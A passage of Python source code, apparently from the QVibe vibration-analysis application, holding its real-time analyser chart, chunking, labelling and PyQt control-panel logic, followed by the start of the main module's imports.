def __init__(self, chart, measurement_name, input, idx, preferences, budget_millis, view, visible):
super().__init__(chart, measurement_name, input, idx, preferences, budget_millis)
self.__view = view
self.__visible = visible
def process(self):
self.output = [self.__make_sig(i) for i in self.input]
self.should_emit = True
def __make_sig(self, chunk):
tas = TriAxisSignal(self.preferences,
self.measurement_name,
chunk,
self.chart.fs,
self.chart.resolution_shift,
idx=self.idx,
mode='vibration' if self.preferences.get(ANALYSIS_HPF_RTA) is True else '',
view_mode='spectrogram',
pre_calc=self.__visible)
tas.set_view(self.__view, recalc=False)
if self.__visible:
tas.recalc()
return tas
class RTA(VisibleChart):
def __init__(self, parent_layout, parent_tab, chart, prefs, fs_widget, resolution_widget, fps_widget,
actual_fps_widget, mag_min_widget, mag_max_widget, freq_min_widget, freq_max_widget,
ref_curve_selector, show_value_selector, measurement_store_signals, colour_provider):
measurement_store_signals.measurement_added.connect(self.__add_measurement)
measurement_store_signals.measurement_deleted.connect(self.__remove_measurement)
self.__ui = ControlUi(parent_layout, parent_tab, prefs)
self.__known_measurements = []
self.__show_average = self.__ui.show_average.isChecked()
self.__ref_curve_selector = ref_curve_selector
self.__show_value_selector = show_value_selector
self.__ref_curve = None
self.__reset_selector(self.__ref_curve_selector)
self.__reset_selector(self.__show_value_selector)
self.__plots = {}
self.__plot_data = {}
self.__smooth = False
self.__colour_provider = colour_provider
self.__move_crosshairs = False
self.__chunk_calc = None
self.__ui.toggle_crosshairs.toggled[bool].connect(self.__toggle_crosshairs)
super().__init__(prefs, fs_widget, resolution_widget, fps_widget, actual_fps_widget,
False, coalesce=True, cache_size=-1, cache_purger=self.__purge_cache)
self.__peak_cache = {}
self.__hold_secs = self.__ui.hold_secs.value()
self.__show_peak = self.__ui.show_peak.isChecked()
self.__show_live = self.__ui.show_live.isChecked()
self.__target_data = None
self.__target_adjustment_db = self.__ui.target_adjust_db.value()
self.__show_target = self.__ui.show_target.isChecked()
self.__show_target_toggle = self.__ui.show_target
self.__ui.target_adjust_db.valueChanged.connect(self.__adjust_target_level)
self.__sg_wl = self.__ui.sg_window_length.value()
self.__sg_poly = None
self.__on_sg_poly(self.__ui.sg_poly_order.value())
self.__frame = 0
self.__time = -1
self.__update_rate = None
self.__active_view = None
self.__chart = chart
# wire the analysis to the view controls
self.__mag_min = lambda: mag_min_widget.value()
self.__mag_max = lambda: mag_max_widget.value()
self.__freq_min = lambda: freq_min_widget.value()
self.__freq_max = lambda: freq_max_widget.value()
self.__on_rta_view_change(self.__ui.rta_view.currentText())
self.__ui.rta_view.currentTextChanged.connect(self.__on_rta_view_change)
self.__on_rta_smooth_change(self.__ui.smooth_rta.isChecked())
self.__ui.smooth_rta.toggled[bool].connect(self.__on_rta_smooth_change)
self.__legend = None
format_pg_plotitem(self.__chart.getPlotItem(),
(0, self.fs / 2),
(-150, 150),
x_range=(self.__freq_min(), self.__freq_max()),
y_range=(self.__mag_min(), self.__mag_max()))
# link limit controls to the chart
mag_min_widget.valueChanged['int'].connect(self.__on_mag_limit_change)
mag_max_widget.valueChanged['int'].connect(self.__on_mag_limit_change)
freq_min_widget.valueChanged['int'].connect(self.__on_freq_limit_change)
freq_max_widget.valueChanged['int'].connect(self.__on_freq_limit_change)
# curve display wiring
self.__ui.show_peak.toggled[bool].connect(self.__on_show_peak_change)
self.__ui.show_live.toggled[bool].connect(self.__on_show_live_change)
self.__ui.show_average.toggled[bool].connect(self.__on_show_average_change)
self.__ui.show_target.toggled[bool].connect(self.__on_show_target_change)
self.__ui.hold_secs.valueChanged.connect(self.__set_max_cache_age)
# S-G filter params
self.__ui.sg_window_length.valueChanged['int'].connect(self.__on_sg_window_length)
self.__ui.sg_poly_order.valueChanged['int'].connect(self.__on_sg_poly)
self.reload_target()
# export
self.__ui.export_frd.clicked.connect(self.__export_frd)
# ref curves
self.__ref_curve_selector.currentTextChanged.connect(self.__set_reference_curve)
# marker curves
self.__show_value_selector.currentTextChanged.connect(self.__set_show_value_curve)
# crosshairs
self.__v_line_label = CurveAwareLabel()
self.__v_line = pg.InfiniteLine(angle=90, movable=False, label=self.__v_line_label,
labelOpts={'position': 0.95})
self.__h_line = pg.InfiniteLine(angle=0, movable=False, label=AccelerationLabel(), labelOpts={'position': 0.95})
self.__chart.getPlotItem().addItem(self.__v_line, ignoreBounds=True)
self.__chart.getPlotItem().addItem(self.__h_line, ignoreBounds=True)
def mouse_moved(evt):
pos = evt[0]
if self.__chart.getPlotItem().sceneBoundingRect().contains(pos) and self.__move_crosshairs is True:
mouse_point = self.__chart.getPlotItem().vb.mapSceneToView(pos)
self.__v_line.setPos(mouse_point.x())
self.__h_line.setPos(mouse_point.y())
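        # throttle crosshair updates to at most 20 events/s via a SignalProxy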
self.__proxy = pg.SignalProxy(self.__chart.scene().sigMouseMoved, delay=0.125, rateLimit=20, slot=mouse_moved)
def __toggle_crosshairs(self, move_crosshairs):
self.__move_crosshairs = move_crosshairs
def __add_measurement(self, measurement):
'''
        Registers the measurement key so its curves can later be offered in the selectors.
:param measurement: the measurement.
'''
self.__known_measurements.append(measurement.key)
def __remove_measurement(self, measurement):
'''
        Removes the measurement's cached data, plots and selector entries.
:param measurement: the measurement.
'''
if measurement.key in self.__known_measurements:
self.__known_measurements.remove(measurement.key)
self.__chunk_calc.reset(measurement.key)
self.remove_cached(measurement.key)
self.__remove_from_selector(self.__ref_curve_selector, measurement.key)
self.__remove_from_selector(self.__show_value_selector, measurement.key)
def __set_reference_curve(self, curve):
'''
Updates the reference curve.
:param curve: the new reference curve.
'''
new_curve = curve if curve != '' else None
old_curve = self.__ref_curve
if self.__ref_curve != new_curve:
logger.info(f"Updating reference curve from {self.__ref_curve} to {new_curve}")
self.__ref_curve = new_curve
min_y, max_y = self.__chart.getPlotItem().getViewBox().state['viewRange'][1]
adj = (max_y - min_y) / 2
if old_curve is None:
self.__chart.getPlotItem().setYRange(-adj, adj, padding=0.0)
elif self.__ref_curve is None:
centre = (self.__mag_max() - self.__mag_min()) / 2
self.__chart.getPlotItem().setYRange(centre - adj + self.__mag_min(), centre + adj + self.__mag_min(),
padding=0.0)
self.__render_target()
self.update_all_plots()
def __set_show_value_curve(self, curve):
'''
Updates the curve associated with the vline.
:param curve: the curve.
'''
curve = curve if curve != '' else None
if curve in self.__plots:
curve = self.__plots[curve]
else:
curve = None
self.__v_line_label.curve = curve
self.__v_line.label.valueChanged()
def __export_frd(self):
'''
Shows the export dialog.
'''
available_data = {n: d for n in self.cached_measurement_names() for d in self.cached_data(n) if d is not None}
if len(available_data.keys()) > 0:
ExportDialog(self.__chart, available_data).exec()
else:
msg_box = QMessageBox()
msg_box.setText('No data has been recorded')
msg_box.setIcon(QMessageBox.Warning)
msg_box.setWindowTitle('Nothing to export')
msg_box.exec()
def __on_sg_window_length(self, wl):
'''
Updates the S-G window length.
:param wl: the length.
'''
if wl % 2 == 0:
self.__ui.sg_window_length.setValue(wl + 1)
else:
self.__sg_wl = wl
if self.__smooth is True:
self.update_all_plots()
def __on_sg_poly(self, poly):
'''
Updates the S-G poly order.
:param poly: the poly order.
'''
self.__sg_poly = poly
wl_min = poly + 1
if wl_min % 2 == 0:
wl_min += 1
self.__ui.sg_window_length.setMinimum(wl_min)
if self.__smooth is True:
self.update_all_plots()
def __set_max_cache_age(self, seconds):
'''
Sets the max age of the cache in seconds.
:param seconds: the max age of a cache entry.
'''
self.__hold_secs = seconds
self.for_each_cache(self.__purge_cache)
def __on_show_peak_change(self, checked):
'''
shows or hides the peak curves.
:param checked: if checked then show the curves otherwise hide.
'''
self.__show_peak = checked
self.update_all_plots()
def __on_show_live_change(self, checked):
'''
shows or hides the live curves.
:param checked: if checked then show the curves otherwise hide.
'''
self.__show_live = checked
self.update_all_plots()
def __on_mag_limit_change(self, val):
'''
Updates the visible y axis range.
:param val: ignored.
'''
self.__chart.getPlotItem().setYRange(self.__mag_min(), self.__mag_max(), padding=0)
def __on_freq_limit_change(self, val):
'''
Updates the visible x axis range.
:param val: ignored.
'''
self.__chart.getPlotItem().setXRange(self.__freq_min(), self.__freq_max(), padding=0)
def __on_rta_smooth_change(self, state):
'''
Puts the visible curves into smoothed mode or not.
:param state: if checked then smooth else unsmoothed.
'''
self.__smooth = state
self.update_all_plots()
def __on_rta_view_change(self, view):
'''
Changes the current view (avg, peak, psd).
:param view: the view.
'''
old_view = self.__active_view
logger.info(f"Updating active view from {old_view} to {view}")
self.__active_view = view
def propagate_view_change(cache):
for c in cache:
c.set_view(view)
self.for_each_cache(propagate_view_change)
self.update_all_plots()
logger.info(f"Updated active view from {old_view} to {view}")
def __on_show_average_change(self, checked):
'''
whether to average the cached data.
:param checked: whether to apply averaging.
'''
self.__show_average = checked
self.update_all_plots()
def __on_show_target_change(self, checked):
'''
whether to show the target curve.
:param checked: whether to show the target.
'''
self.__show_target = checked
self.__render_target()
if self.__ref_curve == TARGET_PLOT_NAME:
self.update_all_plots()
def __adjust_target_level(self, adjustment):
''' Adjusts the target level. '''
self.__target_adjustment_db = adjustment
self.__render_target()
if self.__ref_curve == TARGET_PLOT_NAME:
self.update_all_plots()
def reload_target(self):
'''
Loads the target from preferences.
'''
if self.preferences.has(RTA_TARGET) is True:
self.__show_target_toggle.setEnabled(True)
self.__ui.target_adjust_db.setEnabled(True)
self.__ui.target_adjust_db.setValue(0)
import io
arr = np.loadtxt(io.StringIO(self.preferences.get(RTA_TARGET)), dtype=np.float64, ndmin=2)
f = arr[0]
m = arr[1]
if np.min(m) < 40.0:
adj = 85.0 - (np.mean(m[0: np.argmax(f > 60)]) if np.max(f) > 60 else np.mean(m))
adjusted_m = m + adj
else:
adjusted_m = m
self.__target_data = Analysis((f, adjusted_m, adjusted_m))
else:
self.__show_target_toggle.setChecked(False)
self.__show_target_toggle.setEnabled(False)
self.__ui.target_adjust_db.setValue(0)
self.__ui.target_adjust_db.setEnabled(False)
self.__target_data = None
self.__render_target()
def make_event(self, measurement_name, data, idx):
'''
        Creates a min_nperseg sized window on the data and slides it forward in stride sized steps.
:param measurement_name: the measurement the data came from.
:param data: the data to analyse.
:param idx: the index of the data set.
'''
chunks = self.__chunk_calc.recalc(measurement_name, data)
if chunks is not None:
return RTAEvent(self, measurement_name, chunks, idx, self.preferences, self.budget_millis,
self.__active_view, self.visible)
return None
def reset_chart(self):
'''
Removes all curves.
'''
for c in self.__plots.values():
self.__chart.removeItem(c)
self.__reset_selector(self.__ref_curve_selector)
self.__reset_selector(self.__show_value_selector)
self.__ref_curve = None
self.__v_line_label.curve = None
self.__plots = {}
self.__plot_data = {}
self.__chunk_calc = ChunkCalculator(self.min_nperseg, self.__get_stride())
def on_min_nperseg_change(self):
'''
Propagates min_nperseg to the chunk calculator.
'''
if self.__chunk_calc is None:
if self.min_nperseg is not None and self.fs is not None and self.fps is not None:
self.__chunk_calc = ChunkCalculator(self.min_nperseg, self.__get_stride())
else:
self.__chunk_calc.min_nperseg = self.min_nperseg
def __get_stride(self):
return int(self.fs / self.fps)
def on_fs_change(self):
if self.__chunk_calc is None:
if self.min_nperseg is not None and self.fs is not None and self.fps is not None:
self.__chunk_calc = ChunkCalculator(self.min_nperseg, self.__get_stride())
else:
self.__chunk_calc.stride = self.__get_stride()
def when_fps_changed(self):
if self.__chunk_calc is None:
if self.min_nperseg is not None and self.fs is not None and self.fps is not None:
self.__chunk_calc = ChunkCalculator(self.min_nperseg, self.__get_stride())
else:
self.__chunk_calc.stride = self.__get_stride()
@staticmethod
def __reset_selector(selector):
'''
Clears out the combo.
'''
with block_signals(selector):
selector.clear()
selector.addItem('')
def update_chart(self, measurement_name):
'''
Updates all the curves for the named recorder with the latest data and config.
:param measurement_name: the recorder.
'''
data = self.cached_data(measurement_name)
if data is not None and len(data) > 0:
if data[-1].shape[0] >= self.min_nperseg:
self.__display_triaxis_signal(data)
for axis in ['x', 'y', 'z', 'sum']:
self.render_peak(data, axis)
def __display_triaxis_signal(self, signals, plot_name_prefix=''):
'''
        Ensures the correct analysis curves for the given signals are displayed on screen.
        :param signals: the TriAxisSignals to render.
:param plot_name_prefix: extension to signal name for creating a plot name.
'''
for signal in signals:
if signal.view != self.__active_view:
logger.info(f"Updating active view from {signal.view} to {self.__active_view} at {signal.idx}")
signal.set_view(self.__active_view)
if signal.has_data(self.__active_view) is False and signal.shape[0] >= self.min_nperseg:
signal.recalc()
self.render_signal(signals, 'x', plot_name_prefix=plot_name_prefix)
self.render_signal(signals, 'y', plot_name_prefix=plot_name_prefix)
self.render_signal(signals, 'z', plot_name_prefix=plot_name_prefix)
self.render_signal(signals, 'sum', plot_name_prefix=plot_name_prefix)
def __purge_cache(self, cache):
'''
        Purges the cache of data older than hold_secs.
:param cache: the cache (a deque)
'''
while len(cache) > 1:
latest = cache[-1].time[-1]
if (latest - cache[0].time[-1]) >= (self.__hold_secs * 1000.0):
cache.popleft()
else:
break
def __render_target(self):
'''
Renders the target data.
'''
if self.__target_data is None or self.__show_target is False:
if TARGET_PLOT_NAME in self.__plots:
self.__remove_named_plot(TARGET_PLOT_NAME)
elif self.__target_data is not None and self.__show_target is True:
pen_args = {'style': Qt.SolidLine}
y_db = self.__target_data.y + self.__target_adjustment_db
self.__render_or_update(pen_args, TARGET_PLOT_NAME, self.__target_data.x, y_db)
def render_peak(self, data, axis):
'''
Converts a peak dataset into a renderable plot item.
:param data: the cached data.
:param axis: the axis to display.
'''
y_data = x_data = pen_args = None
sig = getattr(data[-1], axis)
if self.__show_peak is True:
has_data = sig.get_analysis(self.__active_view)
if has_data is not None:
if all([d.shape[0] >= self.min_nperseg for d in data]):
data_ = [getattr(d, axis).get_analysis(self.__active_view).y for d in data]
y_data = np.maximum.reduce(data_)
x_data = has_data.x
pen_args = {'style': Qt.DashLine}
self.__manage_plot_item(f"{sig.measurement_name}:{sig.axis}:peak", data[-1].idx, sig.measurement_name, sig.axis,
x_data, y_data, pen_args)
def render_signal(self, data, axis, plot_name_prefix=''):
'''
Converts (one or more) signal into a renderable plot item.
:param data: the cached data.
:param axis: the axis to display.
:param plot_name_prefix: optional plot name prefix.
'''
y_data = y_avg = x_data = None
sig = getattr(data[-1], axis)
has_data = sig.get_analysis(self.__active_view)
if has_data is not None:
if self.__show_average is True:
if all([d.shape[0] >= self.min_nperseg for d in data]):
y_avg = np.average([getattr(d, axis).get_analysis(self.__active_view).y for d in data], axis=0)
if self.__show_live is True:
y_data = has_data.y
x_data = has_data.x
pen = {'style': Qt.SolidLine}
plot_name = f"{plot_name_prefix}{sig.measurement_name}:{sig.axis}"
self.__manage_plot_item(plot_name, data[-1].idx, sig.measurement_name, sig.axis, x_data, y_data, pen)
avg_pen = {'style': Qt.DashDotDotLine}
avg_plot_name = f"{plot_name_prefix}{sig.measurement_name}:{sig.axis}:avg"
self.__manage_plot_item(avg_plot_name, data[-1].idx, sig.measurement_name, sig.axis, x_data, y_avg, avg_pen)
def __manage_plot_item(self, name, idx, measurement_name, axis, x_data, y_data, pen_args):
'''
Creates or updates a plot item or removes it.
:param name: plot name.
:param idx: the underlying signal index.
:param measurement_name: the originating measurement.
:param axis: the axis for which this data is for.
:param x_data: x data.
:param y_data: y data.
:param pen_args: the args to describe the pen
'''
if y_data is not None:
logger.debug(f"Tick {axis} {idx} {np.min(y_data):.4f} - {np.max(y_data):.4f} - {len(y_data)} ")
self.__show_or_remove_analysis(name, measurement_name, axis, x_data, y_data, pen_args if pen_args else {})
elif name in self.__plots:
self.__remove_named_plot(name)
def __remove_named_plot(self, name):
'''
Eliminates the named plot.
:param name: the name.
'''
self.__chart.removeItem(self.__plots[name])
del self.__plots[name]
del self.__plot_data[name]
self.__legend.removeItem(name)
self.__remove_from_selector(self.__ref_curve_selector, name)
self.__remove_from_selector(self.__show_value_selector, name)
@staticmethod
def __remove_from_selector(selector, name):
'''
Removes the named item from the selector.
:param selector: the selector.
:param name: the name.
'''
idx = selector.findText(name)
if idx > -1:
if selector.currentIndex() == idx:
selector.setCurrentIndex(0)
selector.removeItem(idx)
def __show_or_remove_analysis(self, plot_name, measurement_name, axis, x_data, y_data, pen_args):
'''
If the series should be visible, creates or updates a PlotItem with the x and y data.
If the series should not be visible, removes the PlotItem if it is displayed atm.
:param plot_name: plot name.
:param measurement_name: the measurement name.
:param axis: the axis.
:param x_data: x data.
:param y_data: y data.
:param pen_args: the description of the pen.
'''
if self.is_visible(measurement=measurement_name, axis=axis) is True:
            y = smooth_savgol(x_data, y_data, wl=self.__sg_wl, poly=self.__sg_poly)[1] if self.__smooth is True else y_data
self.__render_or_update(pen_args, plot_name, x_data, y, axis=axis)
elif plot_name in self.__plots:
self.__remove_named_plot(plot_name)
def __render_or_update(self, pen_args, plot_name, x_data, y, axis=None):
'''
actually updates (or creates) the plot.
:param pen_args: the pen args.
:param plot_name: the plot name.
:param x_data: x.
:param y: y.
:param axis: the axis.
'''
self.__plot_data[plot_name] = x_data, y
if self.__ref_curve is not None:
ref_plot_name = None
if self.__ref_curve in self.__known_measurements:
if axis is not None:
ref_plot_name = f"{self.__ref_curve}:{axis}"
elif self.__ref_curve in self.__plot_data:
ref_plot_name = self.__ref_curve
if ref_plot_name in self.__plot_data:
ref_plot_data = self.__plot_data[ref_plot_name]
x_data, y = self.__normalise(ref_plot_data[0], ref_plot_data[1], x_data, y)
if plot_name in self.__plots:
self.__plots[plot_name].setData(x_data, y)
self.__v_line.label.valueChanged()
else:
if self.__legend is None:
self.__legend = self.__chart.addLegend(offset=(-15, -15))
pen = pg.mkPen(color=self.__colour_provider.get_colour(plot_name), width=2, **pen_args)
self.__plots[plot_name] = self.__chart.plot(x_data, y, pen=pen, name=plot_name)
self.__ensure_curve_in_selector(self.__ref_curve_selector, plot_name)
self.__ensure_curve_in_selector(self.__show_value_selector, plot_name, include_measurement=False)
def __ensure_curve_in_selector(self, selector, plot_name, include_measurement=True):
''' Ensures the name is in the combo '''
if selector.findText(plot_name) == -1:
if include_measurement is True:
m_name = next((m for m in self.__known_measurements if plot_name.startswith(f"{m}:")), None)
if m_name is not None:
if selector.findText(m_name) == -1:
selector.addItem(m_name)
selector.addItem(plot_name)
@staticmethod
def __normalise(ref_x, ref_y, data_x, data_y):
'''
Creates a new dataset which shows the delta between the data and the reference.
:param ref_x: the ref x values.
:param ref_y: the ref y values.
:param data_x: the data x values.
:param data_y: the data y values.
:return: the resulting normalised x and y values.
'''
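        # both curves are assumed to sit on uniform frequency grids; when the
        # resolutions differ, the coarser curve is interpolated onto the finer grid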
ref_step = ref_x[1] - ref_x[0]
data_step = data_x[1] - data_x[0]
if ref_step == data_step:
count = min(ref_x.size, data_x.size) - 1
new_x = data_x[0:count]
new_y = data_y[0:count] - ref_y[0:count]
else:
if data_x[-1] == ref_x[-1]:
# same max so upsample to the more precise one
if data_step < ref_step:
new_x = data_x
                    new_y = data_y - np.interp(data_x, ref_x, ref_y)
else:
new_x = ref_x
                    new_y = np.interp(ref_x, data_x, data_y) - ref_y
elif data_x[-1] > ref_x[-1]:
# restrict the self data range to the limits of the target
capped_x = data_x[data_x <= ref_x[-1]]
capped_y = data_y[0:capped_x.size]
if data_step < ref_step:
new_x = capped_x
                    new_y = capped_y - np.interp(capped_x, ref_x, ref_y)
else:
new_x = ref_x
                    new_y = np.interp(ref_x, capped_x, capped_y) - ref_y
else:
# restrict the target data range to the limits of the self
capped_x = ref_x[ref_x <= data_x[-1]]
capped_y = ref_y[0:capped_x.size]
if ref_step < data_step:
new_x = data_x
                    new_y = data_y - np.interp(data_x, capped_x, capped_y)
else:
new_x = capped_x
                    new_y = np.interp(capped_x, data_x, data_y) - capped_y
return new_x, new_y
class ChunkCalculator:
def __init__(self, min_nperseg, stride):
'''
        Creates a new calculator which produces chunks of min_nperseg size, sliding forward in stride sized steps.
'''
self.last_idx = {}
self.min_nperseg = min_nperseg
self.stride = stride
def reset(self, name):
if name in self.last_idx:
del self.last_idx[name]
def recalc(self, name, data):
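        # data is a 2-D array whose first column is a monotonically increasing
        # sample index; returns a list of min_nperseg row windows whose end
        # advances by stride samples, or None if no complete window is available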
last_processed_idx = int(max(self.last_idx.get(name, 0), data[:, 0][0]))
last_sample_idx = np.argmax(data[:, 0] == last_processed_idx) if last_processed_idx > 0 else 0
fresh_samples = data.shape[0] - last_sample_idx
chunks = []
if last_processed_idx == 0:
if fresh_samples >= self.min_nperseg:
chunks.append(data[0:self.min_nperseg])
last_sample_idx = self.min_nperseg - 1
fresh_samples -= self.min_nperseg
if fresh_samples > self.stride:
while True:
next_idx = last_sample_idx + self.stride + 1
if next_idx > data.shape[0]:
break
start = max(0, next_idx - self.min_nperseg)
chunk = data[start:next_idx]
if chunk.shape[0] == self.min_nperseg:
chunks.append(chunk)
last_sample_idx = next_idx - 1
if chunks:
self.last_idx[name] = chunks[-1][:, 0][-1]
return chunks
return None
class CurveAwareLabel:
def __init__(self):
self.curve = None
self.__no_curve_format = '[{value:0.1f} Hz]'
self.__curve_format = '[{value:0.1f} Hz / {mag:0.1f} dB{accel}]'
self.__accel_format = '{sep}{accel:0.3f}{suffix}{unit}'
def format(self, value):
if self.curve is None:
return self.__no_curve_format.format(value=value)
else:
mag = self.__get_y_pos(value)
if mag == -1:
accel = ''
else:
sep = ' / '
unit = 'G'
suffix = ''
accel = 10.0 ** (mag / 20) * REF_ACCELERATION_IN_G
if accel <= 0.1:
accel *= 1000.0
suffix = 'm'
accel = self.__accel_format.format(suffix=suffix, unit=unit, sep=sep, accel=accel)
return self.__curve_format.format(value=value, mag=mag, accel=accel)
def __get_y_pos(self, hz):
try:
x, y = self.curve.getData()
return y[np.argmax(x >= hz)]
        except Exception:
return -1.0
class AccelerationLabel:
def __init__(self):
self.__format = '[{value:0.1f} dB / {accel:0.3f} {suffix}G]'
def format(self, value):
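        # invert the dB magnitude back to acceleration: 10^(dB/20) * reference G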
accel = 10.0 ** (value / 20) * REF_ACCELERATION_IN_G
if accel <= 0.1:
accel *= 1000.0
suffix = 'm'
else:
suffix = ''
return self.__format.format(value=value, accel=accel, suffix=suffix)
class ControlUi:
def __init__(self, parent_layout, rtaTab, prefs):
self.parent_layout = parent_layout
self.rta_tab = rtaTab
self.preferences = prefs
self.rta_controls_layout = FlowLayout()
self.rta_controls_layout.setObjectName("rtaControlsLayout")
self.rta_view_label = QtWidgets.QLabel(self.rta_tab)
self.rta_view_label.setObjectName("rtaViewLabel")
self.rta_controls_layout.addWidget(self.rta_view_label)
self.rta_view = QtWidgets.QComboBox(self.rta_tab)
self.rta_view.setObjectName("rtaView")
self.rta_view.addItem("")
self.rta_view.addItem("")
self.rta_view.addItem("")
self.rta_controls_layout.addWidget(self.rta_view)
self.hold_time_label = QtWidgets.QLabel(self.rta_tab)
self.hold_time_label.setObjectName("holdTimeLabel")
self.rta_controls_layout.addWidget(self.hold_time_label)
self.hold_secs = QtWidgets.QDoubleSpinBox(self.rta_tab)
self.hold_secs.setDecimals(1)
self.hold_secs.setMinimum(0.5)
self.hold_secs.setMaximum(30.0)
self.hold_secs.setSingleStep(0.1)
self.hold_secs.setProperty("value", self.preferences.get(RTA_HOLD_SECONDS))
self.hold_secs.setObjectName("holdSecs")
self.rta_controls_layout.addWidget(self.hold_secs)
self.show_live = QtWidgets.QPushButton(self.rta_tab)
self.show_live.setCheckable(True)
self.show_live.setChecked(True)
self.show_live.setObjectName("showLive")
self.rta_controls_layout.addWidget(self.show_live)
self.show_peak = QtWidgets.QPushButton(self.rta_tab)
self.show_peak.setCheckable(True)
self.show_peak.setObjectName("showPeak")
self.rta_controls_layout.addWidget(self.show_peak)
self.show_average = QtWidgets.QPushButton(self.rta_tab)
self.show_average.setCheckable(True)
self.show_average.setObjectName("showAverage")
self.rta_controls_layout.addWidget(self.show_average)
self.show_target = QtWidgets.QPushButton(self.rta_tab)
self.show_target.setCheckable(True)
self.show_target.setObjectName("showTarget")
self.rta_controls_layout.addWidget(self.show_target)
self.target_adjust_db = QtWidgets.QDoubleSpinBox(self.rta_tab)
self.target_adjust_db.setDecimals(1)
self.target_adjust_db.setMinimum(-150.0)
self.target_adjust_db.setMaximum(150.0)
self.target_adjust_db.setSingleStep(0.1)
self.target_adjust_db.setObjectName("targetAdjust")
self.rta_controls_layout.addWidget(self.target_adjust_db)
self.smooth_rta = QtWidgets.QPushButton(self.rta_tab)
self.smooth_rta.setCheckable(True)
self.smooth_rta.setObjectName("smoothRta")
self.rta_controls_layout.addWidget(self.smooth_rta)
self.sg_window_length = QtWidgets.QSpinBox(self.rta_tab)
self.sg_window_length.setMinimum(1)
self.sg_window_length.setMaximum(201)
self.sg_window_length.setSingleStep(2)
self.sg_window_length.setProperty("value", self.preferences.get(RTA_SMOOTH_WINDOW))
self.sg_window_length.setObjectName("sgWindowLength")
self.sg_window_length.lineEdit().setReadOnly(True)
self.sg_window_length.setToolTip('Higher values = smoother curves')
self.rta_controls_layout.addWidget(self.sg_window_length)
self.sg_poly_order = QtWidgets.QSpinBox(self.rta_tab)
self.sg_poly_order.setMinimum(1)
self.sg_poly_order.setMaximum(11)
self.sg_poly_order.setProperty("value", self.preferences.get(RTA_SMOOTH_POLY))
self.sg_poly_order.setObjectName("sgPolyOrder")
self.sg_poly_order.setToolTip('Lower values = smoother curves')
self.rta_controls_layout.addWidget(self.sg_poly_order)
spacerItem5 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.rta_controls_layout.addItem(spacerItem5)
self.toggle_crosshairs = QtWidgets.QPushButton(self.rta_tab)
self.toggle_crosshairs.setCheckable(True)
self.toggle_crosshairs.setObjectName("toggleCrosshairs")
self.rta_controls_layout.addWidget(self.toggle_crosshairs)
self.save_config = QtWidgets.QToolButton(self.rta_tab)
self.save_config.setObjectName("saveConfig")
self.save_config.clicked.connect(self.__save_config)
self.rta_controls_layout.addWidget(self.save_config)
self.export_frd = QtWidgets.QToolButton(self.rta_tab)
self.export_frd.setObjectName("exportFRD")
self.rta_controls_layout.addWidget(self.export_frd)
self.parent_layout.addLayout(self.rta_controls_layout, 0, 0, 1, 1)
_translate = QtCore.QCoreApplication.translate
self.rta_view_label.setText(_translate("MainWindow", "View"))
self.rta_view.setItemText(0, _translate("MainWindow", "avg"))
self.rta_view.setItemText(1, _translate("MainWindow", "peak"))
self.rta_view.setItemText(2, _translate("MainWindow", "psd"))
self.hold_time_label.setText(_translate("MainWindow", "Hold Time:"))
self.hold_secs.setToolTip(_translate("MainWindow", "Seconds of data to include in peak calculation"))
self.hold_secs.setSuffix(_translate("MainWindow", " s"))
self.show_live.setText(_translate("MainWindow", "Live"))
self.show_peak.setText(_translate("MainWindow", "Peak"))
self.show_average.setText(_translate("MainWindow", "Average"))
self.show_target.setText(_translate("MainWindow", "Target"))
self.target_adjust_db.setSuffix(_translate("MainWindow", " dB"))
self.target_adjust_db.setToolTip('Adjusts the level of the target curve')
self.smooth_rta.setText(_translate("MainWindow", "Smooth"))
self.toggle_crosshairs.setText(_translate("MainWindow", "Move Crosshairs"))
self.toggle_crosshairs.setShortcut(_translate("MainWindow", "Ctrl+T"))
self.toggle_crosshairs.setToolTip('Press CTRL+T to toggle')
self.save_config.setIcon(qta.icon('fa5s.save'))
self.save_config.setShortcut(_translate("MainWindow", "Ctrl+Shift+S"))
self.save_config.setToolTip('Press CTRL+SHIFT+S to save the current config')
self.export_frd.setText(_translate("MainWindow", "..."))
self.export_frd.setIcon(qta.icon('fa5s.file-export'))
def __save_config(self):
self.preferences.set(RTA_HOLD_SECONDS, self.hold_secs.value())
self.preferences.set(RTA_SMOOTH_WINDOW, self.sg_window_length.value())
self.preferences.set(RTA_SMOOTH_POLY, self.sg_poly_order.value())
```
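A quick way to see how `ChunkCalculator` windows a buffer is to feed it synthetic data. The sketch below is illustrative only; the dummy column stands in for the real x/y/z sample columns.
```python
# standalone sketch: watch ChunkCalculator slide an 8 sample window in steps of 4
import numpy as np

from model.rta import ChunkCalculator  # as defined above

calc = ChunkCalculator(min_nperseg=8, stride=4)
# column 0 is the sample index, column 1 a dummy value
data = np.column_stack((np.arange(20), np.zeros(20)))
for chunk in calc.recalc('demo', data):
    print(f"samples {int(chunk[0, 0])}..{int(chunk[-1, 0])} ({chunk.shape[0]} rows)")
# prints windows covering 0..7, 4..11, 8..15 and 12..19
```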
#### File: main/python/qvibe.py
```python
import gzip
import json
import logging
import os
import sys
import time
from model.charts import ColourProvider
from model.measurements import MeasurementStore
from model.rta import RTA
from model.save import SaveChartDialog, SaveWavDialog
from model.spectrogram import Spectrogram
from model.vibration import Vibration
os.environ['PYQTGRAPH_QT_LIB'] = 'PyQt5'
os.environ['QT_API'] = 'pyqt5'
# if sys.platform == 'win32' and getattr(sys, '_MEIPASS', False):
# Workaround for PyInstaller being unable to find Qt5Core.dll on PATH.
# See https://github.com/pyinstaller/pyinstaller/issues/4293
# os.environ['PATH'] = sys._MEIPASS + os.pathsep + os.environ['PATH']
import pyqtgraph as pg
import qtawesome as qta
import numpy as np
from qtpy import QtCore
from qtpy.QtCore import QTimer, QSettings, QThreadPool, QUrl, QTime, QRunnable, QThread
from qtpy.QtGui import QIcon, QFont, QDesktopServices
from qtpy.QtWidgets import QMainWindow, QApplication, QErrorMessage, QMessageBox, QFileDialog
from common import block_signals, ReactorRunner, np_to_str, parse_file, bump_tick_levels
from model.preferences import SYSTEM_CHECK_FOR_BETA_UPDATES, SYSTEM_CHECK_FOR_UPDATES, SCREEN_GEOMETRY, \
SCREEN_WINDOW_STATE, PreferencesDialog, Preferences, BUFFER_SIZE, ANALYSIS_RESOLUTION, CHART_MAG_MIN, \
CHART_MAG_MAX, keep_range, CHART_FREQ_MIN, CHART_FREQ_MAX, SNAPSHOT_GROUP
from model.checker import VersionChecker, ReleaseNotesDialog
from model.log import RollingLogger, to_millis
